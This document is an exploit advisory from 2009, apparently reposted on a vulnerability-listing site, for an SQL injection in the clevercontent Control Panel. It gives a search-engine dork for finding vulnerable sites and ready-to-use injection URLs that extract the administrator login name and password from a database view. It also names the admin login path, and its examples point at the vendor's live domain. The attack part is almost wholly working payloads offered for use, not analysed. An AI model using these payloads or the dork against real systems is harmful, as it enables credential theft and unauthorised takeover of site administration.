clevercontent Control Panel sql injection vulirability

2009.12.07

Credit: AnGeL25dZ

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:\"s_page1.asp?NID=\"

************************************************************
** clevercontent Control Panel sql injection vulirability
************************************************************
** Prodcut: clevercontent Control Panel
** Home : http://clevercontent.ch
** Vunlerability : sql injection
** Dork : inurl:"s_page1.asp?NID="
**
************************************************************
** Discovred by: AnGeL25dZ
** Contact : angel25dz@gmail.com
** g4r@hotmail.com
** *********************************************************
** Greetz to : ALLAH
** All Members of http://Hackteach.org/cc/
** All my friends, Ra3ch & Cold-z3ro & K
**
*************************************************************
************************ Exploit ****************************
*************************************************************
**
** Login :
**
** http://[URL]/site/s_page1.asp?NID=1%2b convert(int, (select top 1 BEN_LOGIN FROM vw_sys_login))
**
** Pass :
**
** http://[URL]/site/s_page1.asp?NID=1%2b convert(int, (select top 1 BEN_PW FROM vw_sys_login))
**
** for admin control panel login : http://[URL]/admin/interface/00_login/index.asp
**
** Note: see the URL format in example
***************************************************************
************************ Example*******************************
**
** http://www.clevercontent.ch/w_cm/site/s_page1.asp?NID=190%2b convert(int, (select top 1 BEN_LOGIN FROM vw_sys_login))
**
** http://www.clevercontent.ch/w_cm/site/s_page1.asp?NID=190%2b convert(int, (select top 1 BEN_PW FROM vw_sys_login))
**
***************************************************************
********************** See U ;-) ******************************
***************************************************************

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

clevercontent Control Panel sql injection vulirability

Dork: inurl:\"s_page1.asp?NID=\"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.